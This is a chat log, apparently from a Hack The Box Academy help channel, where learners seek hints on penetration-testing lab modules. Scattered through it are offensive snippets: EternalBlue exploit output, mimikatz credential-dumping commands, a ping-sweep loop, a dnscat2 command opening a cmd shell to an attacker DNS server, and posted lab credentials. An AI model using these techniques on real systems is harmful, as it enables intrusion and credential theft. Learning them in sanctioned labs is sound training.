#modules

1 messages · Page 432 of 1

fleet axle
#

Is here someone who completed the Process Injection module?

fleet gust
#

thank youu prayge

mental fern
#

hi, i am doing password attack skill assessment. i managed to gain access via ntlm hash of stom, now i am completely at sea. what can i do?

fleet axle
#

I stuck on the following question:

Run the C:\injection\exercises\debug.bat file to simulate a process injection technique. Investigate the Sysmon logs to get the flag. Answer format is CTF{XXX....}

Module: Process Injection Attacks and Detection

I stuck on it for hours, tried everything, but cannt find the flag... Can someone say in what field the flag is? And what event code. I even checked all the logs.

autumn pilot
#

The flag is not in a field

fleet axle
autumn pilot
#

You use the events generated by Sysmon to find it

fathom pendant
fleet axle
autumn pilot
#

Use the source code to reconstruct the timeline with the help of the events

#

The events will assist you into finding the culprit (flag) you are looking for

fleet axle
#

Oh...
I just found it... I was around that all that time, that event exist in my "incident summary", But i though that was deleted xD

Thank you so much!

barren apex
#

Module: Shells & Payloads
Section: Infiltrating Windows

Question: Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:\
This question is about replicating the exploitation of Eternal Blue (already demonstrated in the module)
but when I try to do it in the given lab, the exploit always fails.

I tried resetting both Pwnbox and the lab machine, and I tried doing it from my local machine, but it just doesn't work.
And this is all I get:

[-] 10.129.201.97:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.201.97:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.201.97:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Am I doing something wrong here?

#

The check does return "Vulnerable" but the exploit just doesn't work

forest tendon
#

hey guys can anyone help me understand the difference between an AD domain and a website domain? i mean in an ad environment why must we use <somedomain>.com ? and does it point towards a website? or is it just a practice and can be anything in general?

young sentinel
#

Noob here with some noob ??. I am using Kali and I get in and all. I am in the middle of the Linux Fund. and am I supposte to be running these commands: sudo apt install openssh-server -y, systemctl status ssh, sudo systemctl start apache2, curl http://localhost, and many more. Or are they info to be thought on later or used later? Because every time I urn the sudo's it asks for a pw and I put in the only one I know and I have had a few "Warning...this will be reported" statements. I'm learning here and I don't have any Sister Betty's smacking me for going to fast or not typing correctly. Any info would be and is good info. Thanks

rustic sage
#

Hey
Stuck in password attacks modules skill assessment got into jump01 through h___ user got shares from file01 created a username list just confuse what would be the password for password spraying also get the safe3 shortcut file at desktop any hints

timber pewter
#

Could I possibly DM you around the same topic @fathom pendant? I may have found the file you're referring too but I think I must be applying it incorrectly

fathom pendant
timber pewter
fathom pendant
fathom pendant
#

because there could be multiple ways forward, i just stuck with some of the more simple stuff

#

yeah my wires got crossed between the Net Share section and the skill assessment for a sec

#

but there is a file related to the program on the desktop

faint hamlet
fathom pendant
#

at least that's what i used to move forward

fathom pendant
fathom pendant
rustic sage
#

Ok let me see

rustic sage
fathom pendant
leaden lichen
#

Hi everyone! I’m currently working through the Hack The Box modules, but I’m stuck on one of the questions. No matter how many times I try, I can’t seem to get the correct answer. Could someone help or guide me a bit? Thanks in advance! 🙏

fathom pendant
#

Yes

#

Also, you can just use first letter * to redact username

rustic sage
#

ok Sry

#

New in the group

leaden lichen
#

Thanks for replying! I’m working on the “Linux Fundamentals” module, specifically in the section where we’re asked to identify the network interface with an MTU of 1500.

The issue is that I’ve already run the correct commands like ip a and reviewed the output carefully, but none of the interfaces shown in the terminal are being accepted as the correct answer. I’ve tried all the possible values that appear, including ens3 and tun0, and even double-checked for typos.

Is it possible the question expects a different format or maybe a specific output from a certain user perspective (like htb-student vs current user)? I’m really stuck and would appreciate any guidance.

#

Hello 🫥

fathom pendant
fathom pendant
vocal schooner
#

Hello, i need some help I think I misunderstood the logic about the module "Introduction to C# > Arrays"

The question : How can you access the element in the third row and second column of a two-dimensional array named grid in C#?
Someone could help me ? ty

#

for me that is the answer, but no

vernal tapir
#

Hi sorry if this is the wrong section, I've been trying to get EyeWitness to work on my Parrot VM but I'm stuck at this error. I've tried installing all dependencies, installed the clean github version and ran the setup and requirements.txt

fathom pendant
#

@leaden lichen don't dm without asking here. It will get ignored

junior fjord
#

hey i have a doubt please allow me to DM any moderator, i compeleted a lab but dont know how i completed the lab means i have to know my mistakes

leaden lichen
fathom pendant
vocal schooner
#

Console.WriteLine(grid[2,1]);

fathom pendant
#

¯_(ツ)_/¯

#

I haven't done the module

vocal schooner
junior fjord
#

hey can anyone tell me...........

vocal schooner
#

np thanks anyway

fathom pendant
tame basalt
fathom pendant
#

Or as root

tame basalt
#

I'll try. 😄 Thanks!

vocal schooner
fathom pendant
#

Yeah... the question says access not print

tame basalt
#

I'm in the rdp and got the db manager up and running

fathom pendant
tame basalt
fathom pendant
#

Well yes the password, but maybe a different user

abstract ingot
#

hii, im hard stucked in module "pass the certificate", i think im doing everything ok but can´t even get the certificate. im talking about the first part of the module, where u have to use ntlmrelayx and printerbug

rose zodiac
#

,hi guys, in password attack module , pass the certificate Section any hint for What are the contents of flag.txt on Administrator's desktop? ,, i tried everything and even found some creds but are not valid. help please.

fathom pendant
abstract ingot
#

can dm?

fathom pendant
#

No

#

When I went through it, I did everything from the section and it worked just fine

abstract ingot
#

yes but there was an update

fathom pendant
#

I'm referring to doing it after the update

abstract ingot
#

oh

rose zodiac
#

u didnt find problems with the second question?

fathom pendant
#

I had no issues aside from the oscrypto thing. But it all worked just fine

tame basalt
fathom pendant
rose zodiac
#

i mean i found creds to the admin that seems valid but they didnt work, except over smb where the flag isnt in his desktop there :[ any hints?

fathom pendant
#

Also there's a dump you can do for admin

rotund scarab
#

Hi guys, im on the knowedge check module (in the same section as privesc from before) and im trying to gain a foothold but cannot find any place to upload, what could i do?

fathom pendant
#

Module = book, section = chapter

rotund scarab
#

Ah got it
So knowledge check section under the getting started module

fathom pendant
#

Yes

rotund scarab
#

So what could i do? Ive been through all the areas in the site

fathom pendant
#

And it may not be a file upload vulnerability

#

You'll need to find a way into the admin panel to figure out more information

rotund scarab
#

Im in the admin panel and browsed around alot, could it be to do with adding/editing? (Trying not to give out alot more info)

fathom pendant
rotund scarab
#

Alright thanks

tropic wind
#

Hey i'm really not sure what I'm missing but I'm still struggling on https://academy.hackthebox.com/module/147/section/1334
I've tried manspider with multiple different keywords and found around 10 passwords but none of them have worked, netexec times out instantly, powerhuntshares wasnt finding anything interesting and snaffler output was hard to look through so I may have missed something there.

fathom pendant
#

A list of common credential patterns is provided in the section

tropic wind
#

ah I didn't notice, ill look at that too

rose zodiac
solemn wing
#

I am currently pursuing a college gradution but i don't have any .edu like emails. Is there a way I can get the 8$ subscription. Just confused. Let me know

fathom pendant
tropic wind
#

Finally found it thank you for the help

solemn wing
#

Thanks

sick anvil
#

someone help me out with this one, im new to hack the box just started intro to academy and im stuck with this question: This module is a tier 0 "free" module. What is the total cubes that will be rewarded back to you by completing it?

#

ans should be 10 right?

steep forum
#

If I remember, it should reward you back the amount of cubes you spend on it.

fathom pendant
#

@clear seal be mindful and use more appropriate language

clear seal
#

Whoops lol sorry

sick anvil
#

yeah exactly , but idk whatever am writing it says incorrect answer i wrote 10, same amount what not

abstract ingot
#

at the end of the pass the certificate module u have to privesc to read administrator desktop flag?

sick anvil
#

I CANT START MY INFO SECURITY LESSON UNTIL I COMPLETE THIS MODULE IM DONE WITH IT ALL JUST THIS 1 QUES REMAINS

sick anvil
#

nah 😦

gray yacht
sick anvil
#

havent been able to find an answer to that specific easy question sir

fathom pendant
sick anvil
#

its intro to academy,academy structure

#

below htb academy structure, theres module

fathom pendant
#

the answer should be "10"

#

they're either expecting it as the "number" or "number cubes"

rose stratus
#

Can I DM someone for nudge on File Inclusion assessment section?

coral steppe
#

Yo

#

I am new here

fathom pendant
marsh vessel
#

hello i am stuck in the Live engagement Section in shells and payload module i can't find any browser in the foothold machine and also the username and the password givin in the hint how should i have known them or it's just prediction ?

fathom pendant
marsh vessel
#

thanks sadglas

unreal thorn
#

Hey

#

Hello everyone,so my phone displays ads every time on every app can't even use my phone for seconds without these ads appearing.I've tried to reset app preferences, look for suspicious apps block permissions but the ads won't stop,any solution if someone knows what's going on with my phone

fathom pendant
flint palm
# unreal thorn Hey

Try to reset to factory settings and if doesn't help re install operating system. And yes this server is not tech support.

unreal thorn
#

Noted

sage void
#

Can anyone offer a helping hand with the credential hunting in network shares

viscid epoch
tropic wind
#

I added inlanefreight.htb to /etc/hosts with target IP but I can't ssh in? It keeps telling me permission denied but im using the provided credentials

autumn pilot
#
ssh david@inlanefreight.htb@inlanefreight.htb -p 2222
tropic wind
#

ah

#

i was overthinking it, thanks lol

sage oyster
#

1st module wifi

Follow the steps shown in the section to scan for available WiFi networks. What is the ESSID name of the 3rd WiFi Network (Cell 03)?

root@WiFiIntro:/home/wifi# iwlist wlan0 scan | grep 'Cell|Quality|ESSID|IEEE'
Cell 01 - Address: D8:D6:3A:EB:29:D4
Quality=70/70 Signal level=-30 dBm
ESSID:"HackTheBox"
IE: IEEE 802.11i/WPA2 Version 1
Cell 02 - Address: D8:D6:3A:EB:29:D4
Quality=70/70 Signal level=-30 dBm
ESSID:"HackTheBox-5G"
IE: IEEE 802.11i/WPA2 Version 1
Cell 03 - Address: D8:D6:3D:EB:29:D5
Quality=61/70 Signal level=-49 dBm
ESSID:"CyberNet-Secure"
IE: IEEE 802.11i/WPA2 Version 1

the answer CyberNet-Secure give me an error, could someone help me ?

vestal fable
#

I'm just following the example, and i can't figure out what am i missing

#

not sure if i'm missing something or if it is my nc

#

idk, everything seems ok

fathom pendant
#

The dateserver ip*

vestal fable
#

still no connection D:

#

weird

barren apex
#

is this prompt custom made, or is it the version of msfconsole installed?

#

I updated metasploit on my local VM, but the prompt is still the same as the old one.

vestal fable
#

fixed, i'm just dumb

flint palm
#

am I only person who is facing problems with login today telling me that I am a bot?

vestal fable
#

Idk my account was already logged in

flint palm
#

support says it all because of google

fathom pendant
#

it's because they use recaptchav3

flint palm
#

any ways to improve my score?

fathom pendant
#

try logging in on a different browser or in incognito mode

flint palm
#

incognito mode doesn't work even

#

I tried incognito mode as well

fathom pendant
#

you can also try disabling some extensions

#

or waiting a little bit then trying again, or using a vpn

flint palm
#

haven't had that problem for a very long time

fierce hamlet
fathom pendant
#

if you're coming in the server just to troll you can just as easily get the boot

limber fog
#

Hey
In Active Directory Enumeration & Attacks > Miscellaneous Misconfigurations, I cannot connect to RDP, has anyone RDP connectivity issues ?

#

I've tried:

  • htb-student:Academy_student_AD!
  • htb-student:HTB_@cademy_stdnt!
#

I RDP to the first one, the other one I was able to connect via SSH

safe star
#

exegol uses the $USER variable for the prompt

limber fog
#

It still doesn't work, i tried without variables, but same result

sacred rock
#

I think you don't need to RDP/SSH into ACADEMY-EA-ATTACK01 to solve the questions

safe star
#

Yeah just like the rest of the module

sacred rock
limber fog
#

First question is Find another user with the passwd_notreqd field set. Submit the samaccountname as your answer. The samaccountname starts with the letter "y".
I need to enumerate accounts on the domain, so I need a domained-joined machine, right ?

#

In the course it's enumerated from PS, I guess I could look for the Linux version, but I was looking to apply the commands presented in the course

sacred rock
safe star
#

Maybe try restarting the target

fathom pendant
safe star
#

Yeah that too

limber fog
#

I had already done it, but I think it's a target issue - & I should try again - as I tried the target on the section after this one (Domain trust) and was able to RDP with the same command.

#

Thank you for your answers !

fickle siren
#

are there modules that reward more cubes than they cost to unlock, aside from the intro?

full echo
#

Look at the example code in the module.
What method will return a string to the Java layer?

rain hawk
#

Oh I will
Thank you

opal cape
#

hey people. In the linux privilege escalation Python library hijacking, i keep getting "sorry, you are not allowed to set the following environment variables: PYTHONPATH"

#

i cant figure this out for the life of me

#

any help?

left lintel
foggy monolith
#

Getting a 403 error in the Prompt Injection Attacks § Direct Prompt Injection lab. Any idea why? Using the correct credentials to forward the ports.

cloud urchin
#

403 error means the server understood the request but refused to process it. Why did it refuse to process isn't known to me, but usually it's a credential issue.

foggy monolith
#

If it's a credential issue then it's also a lab issue because htb-stdnt:4c4demy_Studen7 are the exact credentials that the module instructs you to use.

abstract solar
#

hello guys
someone know if I needs help in Sherlock who I can ask for ?

fathom pendant
#

modules (tier 1 and above) return 20% of the cubes paid

#

the only exception if you're using an accessed based subscription, you will still get the 20% module return as if it were unlocked with cubes

opal cape
fathom pendant
#

yep

fathom pendant
cloud urchin
green comet
#

Hi, I believe there is a small error in the module active directory and enumeration (ACL Enumeration) about a powershell 1 line using -filter instead of -LDAPFilter resulting in a "BadEnumeration" error.

cloud urchin
fathom pendant
cloud urchin
#

-Filter uses powershell expression, not LDAP, ObjectClass is a mutivalued attribute in AD and -like doesn't work that way, you can't filter multivalued attributes like OBjectClass using -Filter with -like.

formal arch
#

hey guys i have isuse proxychains] Strict chain ... 127.0.0.1:8888 ... 127.0.0.1:8888 <--socket error or timeout!

cloud urchin
formal arch
#

===============================================

#

===============================================

cloud urchin
#

which module and section is this? it's weird you're trying to use 127.0.0.1

formal arch
cloud urchin
#

proxychains just sends your command through the chisel connection you already setup, so you're connecting to the pivot with proxychains and then trying to run evil-winrm against 127.0.0.1, which is the pivot host. so you don't really need proxychains in this situation.

fathom pendant
#

deleted your message because it contains spoilers for a skill assessment

formal arch
#

I have tried everything, but it still doesn’t work.

fleet socket
#

Hello, I am currently on the Pivoting, Tunneling, and Port Forwarding section and the DNS Tunneling with Dnscat2 module. I am currently getting an error on both my VM and pwnbox when attempting to use the dnscat2 client cmdlet on the windows target machine after starting the dnscat2 server on my attack box. The error from the windows powershell prompt is:

PS C:> Start-Dnscat2 -DNSserver 10.10.14.219 -Domain inlanefreight.local -PreSharedSecret a021cf12e740dc710545419b29c640d4 -Exec cmd
Start-Dnscat2EncInit : Failed to negotiate encryption. Ensure your dnscat2 server is set up correctly.
At C:\dnscat2.ps1:1462 char:20

  •     $Session = Start-Dnscat2EncInit $Session $False
    
  •                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
    • FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Start-Dnscat2EncInit

The error from my attack box when the connection is attempted and fails is:

dnscat2> New window created: 1
Error caught (for more information, check window 'dns1'):
#<NameError: uninitialized constant SHA3::Digest::SHA256>

Would someone be able to help out regarding the issue I am facing and point me in the right direction?

formal arch
# fleet socket Hello, I am currently on the Pivoting, Tunneling, and Port Forwarding section an...

It seems that the dnscat2 server is missing the SHA3 digest support, which is causing the encryption negotiation to fail on the client side. This typically happens if the Ruby environment running dnscat2 server lacks the required SHA3 digest library.

To fix this, you should ensure that your Ruby installation has the 'digest-sha3' gem installed. You can do this by running: gem install digest-sha3
After installing the gem, restart your dnscat2 server and try again Also, double-check that the server and client versions of dnscat2 are compatible and correctly configured, especially the shared secret and domain settings.

If you are running dnscat2 server on a Linux box, make sure Ruby is updated and that all dependencies are met.

Message #modules

fleet socket
formal arch
#

The error you’re getting — uninitialized constant SHA3::Digest::SHA256 — usually means the Ruby environment doesn’t have the proper sha3 gem or the version is incompatible. You mentioned you tried reinstalling Ruby, which is a good step. You might want to try this:gem uninstall sha3
gem install sha3 --version "<= 0.1.1" Some users reported success by downgrading the gem version. Also make sure your Ruby version is compatible (e.g., Ruby 2.7.x works more reliably with dnscat2 than newer versions). Again, I’m not super experienced with this

nova pecan
#

struggling a little on the enumeration hard skills assessment. ive scanned the ports and cant seem to get a foothold into any services. any tips?

somber gust
#

Password Attacks - Attacking Windows Credential Manager. Can anyone help me with the question: What is the password mcharles uses for OneDrive? I've got access to the Administrator cmd.exe, downloaded mimikatz.exe with certutil and run [privilege::debug], [sekurlsa::logonpasswords full], [sekurlsa::dpapi], [sekurlsa::credman], but the only password in clear text of mcharles I've found is ||proofs1insight1rustles!||, but when I send the answer is wrong.

cloud urchin
#

that is not the way

cloud urchin
rose axle
#

Hi guys got stuck on the Password Attacks module on Attacking Windows Credential Manager need help on how I can do a misconfig UAC bypass

rose axle
devout axle
#

Hey everyone, I'm on the Password Attacks Module, at the Introduction to JohnTheRipper. I'm supposed to crack a password but I don't have a target to spawn. Am I missing something?

autumn pilot
#

The password hash is in the section, you don't need a target to crack the password. You can use the workstation or your VM to do the cracking

devout axle
#

Ah thanks

reef sonnet
#

stuck on AD Enumeration & Attacks - Skills Assessment Part I
after kerberoasting and stuff, there is a question about finding a user with plaintext password.
I found a user, but can't retrieve plaintext password via mimikatz.
Any help?

safe star
#

Have you tried nxc

reef sonnet
digital pendant
#

Is there an easy way to do ping sweep on 172.16.X.X network?

without an nmap binary on the target/pivot

#

for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done this gives me the 172.16.5.X network just fine, not sure how to modify to give me wider range .X.X

faint geode
#

Make another loop that for for j in {1..5}

Once the 1..254 is done it will loop to 2, do the 1..254 and repeat

safe bramble
#

Can someone guide me on how to use the click here to spawn the target system, Linux fundamentals. Am stack on navigation section questions

full echo
grizzled schooner
#

Credential Hunting in Network Shares -- Any idea why PowerHuntShares isn't working? Please @ with replies

autumn pilot
#

Is it a PowerShell script? If yes, think about the terminal you need to run it from

grizzled schooner
#

Tried Powershell as well

#

I got the same error, it's as if the script isn't installed right or something

sacred rock
#

Have you imported the module?

grizzled schooner
#

I don't see anything in the powerhuntshares folder to import

sacred rock
#

Check again, because there is

grizzled schooner
#

only thing I found was the .psm1 but that throws me errors any way I try to import, but I'll keep looking I guess, thanks!

sacred rock
#

That's exactly it. The error is possibly the execution policy, which you need to bypass by running: powershell -ep bypass

grizzled schooner
#

"is not recognized as the name of a cmdlet,
function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the
path is correct and try again."

I didn't think that would give any indication that the execution policy was wrong?

fathom pendant
fathom pendant
grizzled schooner
#

... sigh I'm going back to bed lmfao

spiral phoenix
#

Hello, I'm stuck in module Active Directory Enumeration & Attacks Skill Assessment 2. I have compromised the MS01 machine but I'm having a hard finding the weak credentials for the second user (Question 4 & 5).
I've tried spraying with the first password on all users, brute-force with common passwords (password, inlanefreight, etc.), I also looked on MS01 for credentials in clear text but no luck. looked in shares also and found nothing (DC included).
Any help would be appreciated (no spoilers plz)

gray yacht
spiral phoenix
spiral phoenix
grizzled schooner
zenith depot
#

hey guys i just subscribed to VIP for labs but i wait so long and none of the machines load up

fathom pendant
#

powershell -ep bypass just launches a powershell session with the execution policy set to bypass

fathom pendant
zenith depot
#

its been on this forever Machine is spawning, please stand by...

fathom pendant
#

if you're having technical issues as well: reach out to support

compact patrolBOT
shut crypt
#

Mmmm

grizzled schooner
#

When using nxc to try and spider for creds I keep getting this error... Can anyone help with this? I don't know enough to be able to make sense of this:

``SMB 10.129.234.173 445 DC01 [*] Spidering .
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 986, in non_polling_read
received = self._sock.recv(bytes_left)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
TimeoutError: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/nxc/protocols/smb/smbspider.py", line 166, in search_content
contents = rfile.read(4096)
^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/nxc/protocols/smb/remotefile.py", line 30, in read
data = self.__smbConnection.readFile(self.__tid, self.__fid, self.__currentOffset, bytesToRead)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 572, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 2065, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1400, in read
ans = self.recvSMB(packetID)``

#

There's more to the error code(s) I just can't paste all of it

stuck hollow
gray yacht
#

This has nothing to do with this channel.

junior fjord
#

Hey, I don't know how in my burp "proxy" tab is not showing

#

I think it's any miscofuguration

#

How can I undo any changes happened ?

gray yacht
flint palm
#

Guys hello In Introduction to Bash scripting what is the format of the answers?

flint palm
#

I understand that not flag format in the first exercise I have to submit a number but it doesn't take a number

#

may be number in letters?

safe star
#

you probably got the wrong number

#

can you send me your solution

grizzled schooner
#

Wish me luck guys, PW Skill Assessment here we go... I give myself 30 minutes of actively trying before I need help LOL

flint palm
safe star
#

i just copied the code to a bash script and edit it

flint palm
#

yes but the code should be executed somehow to get results

#

to see this results somewhere

safe star
#

yeah i just ran bash script.sh

#

it you edit it correctly you will get the answer

flint palm
#

1197735

#

is my answer

#

but can't submit it

crimson leaf
#

You should be able to submit it. If you reload the page sometimes that helps.

latent harness
#

Dumb qtn but aren't ppl bored reading modules?
I mean Im reading Vulnerability analysis, and I just can't focus it

#

(I do this as a hobbie, not a pro)

crimson leaf
safe star
latent harness
#

Hmm makes sense, thx. Idk I have this sort of fomo for imp stuff so i was just trying to read full stuff

reef sonnet
raw hornet
#

Good day, I hope everyone is well! Could someone please help me with the last point of DACL Module I? I've already solved the other three points; I just need the last one. Thanks in advance.

flint palm
faint rampart
#

Hey, anyone know if sharpWSUS behaviour usually like this, the installation of the update just hangs on 33%, if I'm gonna have to always do it manually then what really is the point of the tool lol

tropic wind
#

I'm stuck on https://academy.hackthebox.com/module/147/section/1657 on the second to last step.
I have root on the system and am currently trying to run proxychains impacket-wmiexec dc01 -k after exporting the location of the ccache file but it continues timing out, the main thing I can think of is if my /etc/hosts file is wrong but I'm not exactly sure. I can provide screenshots in dms if needed.

tropic wind
fathom pendant
tropic wind
modern apex
#

Does anyone have a second tosanity check some vhost fuzzing I'm working on? I have set up the /etc/hosts file but the gobuster command I use keeps returning the connection reset by peer. Is there an obvious piece I'm missing here?

fathom pendant
#

@warm tartan for r0lf you need the WHOLE line not just the beginning part but everything in that line

fathom pendant
warm tartan
fathom pendant
modern apex
fathom pendant
#

did you paste it or do some echo "thing here" > test.txt

fathom pendant
warm tartan
#

echo but I succeeded actually just don’t put the extension . txt it’s surprising...

fathom pendant
#
/etc/hosts
10.129.123.46 inlanefreight.htb

-> ffuf -u http://inlanefreight.htb:port

fathom pendant
#

the extension generally wouldn't matter

#

from what i recall

warm tartan
fathom pendant
#

if you wanna see more what i mean just do echo "<paste the whole thing>" and you'll see how it massively truncates and fucks everything up

modern apex
fathom pendant
#

.htb isn't a publicly routed tld

dusty ledge
fathom pendant
modern apex
fathom pendant
severe inlet
#

How is the password attacks module only 8 hours? The rest of the modules times were pretty accurate i think this one is like 3 days instead of 8 hours
Or maybe im finding it hard idk

fathom pendant
#

i wouldn't put too much stock in the time estimates

severe inlet
modern apex
#

Might be a silly question but would the 'vulnerable box' be setup to reject any IP that doesn't match the VPN network ranges i.e. 192.168.9.122 gets connection reset but a 10.10..15.71 gets run through? The IP I'm enumerating is a public IP so i assumed it wouldnt matter for the VPN being active.

modern apex
sacred rock
somber gust
fierce marten
#

In the Active Directory Enumeration & Attacks I found this problem In section of Making a Target User List

fierce marten
sacred rock
#

Well, there you go

fierce marten
#

same prb

sacred rock
#

screenshot please

fierce marten
sacred rock
#

Confirm if the DC IP is correct

fierce marten
#

One sec is the target ip = the DC IP if am right?

sacred rock
#

Target IP is ATTACK01

fierce marten
#

oh got it so the ip of DC is the one in the module 172.16.5.5?

#

they should call it Attacker IP XD

#

Thanks Bro

sacred rock
naive parrot
#

I feel so stupid I haven't been on hackthebox for a couple of weeks and I'm getting back and I'm stuck

#

I can't do any of the questions I've been reading the module but I just don't understand if it's because I need to configure the "/etc/samba/smb.conf" or I need to do a nmap

#

I can't connect to the smb server

stuck hollow
naive parrot
#

I've tried multiple commands and I get the same one each time

#

my nmap was working tho

#

so I know my vpn is not the issue

#

also is it normal I always have to use -Pn with my nmap ?

coarse glacier
#

Hi

#

Can you type this? ꧁꧂

naive parrot
#

?

severe inlet
naive parrot
#

my nmap is failing and tells me to use -Pn which is crazy

severe inlet
#

i think without the -Pn it sends ICMP Echo requests which by default windows dont reply to so i think thats the reason but i could be wrong

lone sluice
#

I need help with the guided lab from Intro to Active Directory...I just do not know what to enter into the powershell to add users. It's my first time using AD. Are there any videos I could watch to help?

stuck hollow
inner sand
#

guys is there anyway to access the tier3 modules but the cubes ?

#

Because they cost a lot to buy the cubes for them

cloud urchin
#

@void tendon Please take care not to post content from modules above tier 0

hushed hazel
#

is there performance issues at the moment with academy? vm's are taking significantly longer to fire up

orchid patrol
#

Hello @cloud urchin

hushed hazel
#

might just be multiple servers as part of the exercise, its working now

tulip minnow
#

with one of the labs

cloud urchin
#

@tulip minnow Please take care not to post flags

orchid patrol
tulip minnow
#

oops sorry

cloud urchin
tulip minnow
#

its not taking the answeer even tho its correct lol

cloud urchin
tulip minnow
#

module/41/section/441

orchid patrol
#

I meant reverse the network protocol

cloud urchin
#

No. This channel is dedicated to discussion of the academy modules on HTB, you'll need to read the #rules and follow the instructions in #welcome to gain access to other channels.

cloud urchin
tulip minnow
#

JavaScript Deobfuscation

orchid patrol
tulip minnow
cloud urchin
tulip minnow
#

oh?

#

so what does it want

#

im confused does it want the function?

cloud urchin
tulip minnow
#

im so blind

#

sorry for my stupidity lol 🤕

cloud urchin
#

not stupid no worries

full echo
# naive parrot also is it normal I always have to use -Pn with my nmap ?

It depends where you are assessing.

On Windows, with the public profile on standalone host by default, it will block Ping packets. It only allows ICMP on a domain-joined env that has a firewall domain profile selected.

So sending out icmp packets to see if the host is active will likely be blocked over 80% in the real world.

tranquil fulcrum
#

thanks

#

also can i get a nudge with the password attacks module.. i've been trying to guess mark's password, mutated the wordlist using the ||best64.rule|| from the wordlist before it like 5 times, and now i end up with 4 million passwords, but i'm nowhere near to cracking it

warm creek
#

So I’m doing the Linux fundamentals and when it is asking for the index number of the sudoers file in the /etc directory and I run the command ls -i /etc/sudoers and it gives me the index number, when I type in the answer it keeps saying it’s wrong. What do I do?

silent ivy
#

I have something I'm slightly confused by right now. I'm in the Getting Started module in the Nibbles box sections. I decided to do the box on the Labs site instead of Academy because I've had issues where targets terminate when I change the page to a new section. But, it seems the flags are different between the Academy version and the Labs version, is this intended?

Edit: The first flag does not work from the flag.txt on the main site (Labs) in the academy answer box.

stuck hollow
#

i cant ping this message as rules break, dont know why. Can @fathom pendant @cloud urchin erase it?

jolly swift
#

The only option for you is to contact the support team of wherever you were hacked

silent ivy
#

No one here will help with this. This is not that kind of server.

cloud urchin
#

@fathom void No. Not this kind of server.

#

@true forum No. Not this kind of server.

cloud urchin
#

@ancient snow Please take care not to spoil content from modules above tier 0, especially skill assessments

#

You can articulate your issue in such a way that doesn't reveal attack paths or content from the skill assessment, and if you feel like you need to reveal a little more info ask to take it to DM's.

#

Anyone who has completed the skill assessment doesn't need the intimate details of it because they've done it and know exactly which accounts, what access, etc. No need to say those things at all.

cloud urchin
#

Sorry, I was just answering your question

simple kettle
balmy condor
#

Why am i having permission to only message here

storm elk
#

Because you did not read and follow #welcome

woven hare
#

Hello! I am currently doing the module Password Cracking, the section Pass the Certificate, and I am stuck on the second question of getting the Admin flag. I have managed to get the admin credentials but I am unable to log in through evil-winrm. Is there anyone who has done this who could help?

sacred rock
rain plume
#

Hi idk if i ask it here but like this server is abt leaening cybersecurity right

zenith depot
#

nothing works no VPNs nothing

#

how do i even do boxes when nothing works goofies

red orchid
#

hello guys please who is currently on the pen testing job path, i am trying to find people to study with

woven hare
sacred rock
compact patrolBOT
waxen totem
#

What is it?

gloomy ingot
waxen totem
#

Dont dm people without permission
-# ill just ignore them

waxen totem
odd stirrup
#

any idea why lab systems in the modules often become unresposive after a short time? refreshing/killing them doesn't stop them to become unresponsive after a couple of scans

spark cobalt
#

Has anyone managed to get the last question requiring you to use the VNC password to connect to the DC after you decrypt it? I've got the shell on the backup and set up my routes; however, I keep getting a refused connection. Kinda lost at this point of what else to do, i've even tried to set up pivoting and it still not liking it.

fathom pendant
#

The best way to solidify your understanding is to run it

spark cobalt
#

Exactly what MarcieLee said, also just playing around and testing will further help solidfy it.

drowsy tiger
#

please I want to learn how to crack smtps

fathom pendant
#

Is it the footprinting smtp? Common services smtp? NEI to properly push you forward

drowsy tiger
fathom pendant
#

Buddy

#

Is your question related to an htb academy module

#

If not, those modules both cover smtp to an extent

drowsy tiger
#

ok how do i procced

fathom pendant
#

If your question isn't related to those modules, then this isn't the channel to ask your question

flint palm
#

guys can someone help me with bash script?

#

comparison operators section of introduction to bash scripting

vocal schooner
slim coyote
#

Can I get a sanity check for advanced CSRF skill assessment

#

I managed to get a working XSS payload but the bot won’t click when I try to access the admin endpoint or promote myself

#

It works when I visit my page but for some reason it doesn’t work with the bot

gray yacht
spark cobalt
marble palm
#

Hi guys I'm learning the web proxy module and I'm stuck on the repeating requests I would appreciate some one to help me when I send a request trying to get the flag in burp like send ip=1; ls /home I get no response body but tried wrap it in echo but still get the same response I don't what to do guys even chatgpt has failed me

rancid chasm
#

I have a problem submitting an answer to a question in Analytics machine, can anyone help me!!!

rancid chasm
#

i run lsb_release command on the machine, it gives output with xx.xx, but the question has xx.xx.xx format, how can i submit that

fathom pendant
fathom pendant
rancid chasm
fathom pendant
acoustic owl
fathom pendant
#

the "redirect" is discord (because you don't have permissions to type in #welcome) directing you to the "latest active channel" which is nothing that we can control

rancid chasm
#

ok thanks

fathom pendant
#

@vocal hollow i suggest not talking about specific attacks, especially for a skills assessment

river grove
#

Would really appreciate a hint of what I'm doing wrong on HTTP Response Splitting part of HTTP attacks prayge

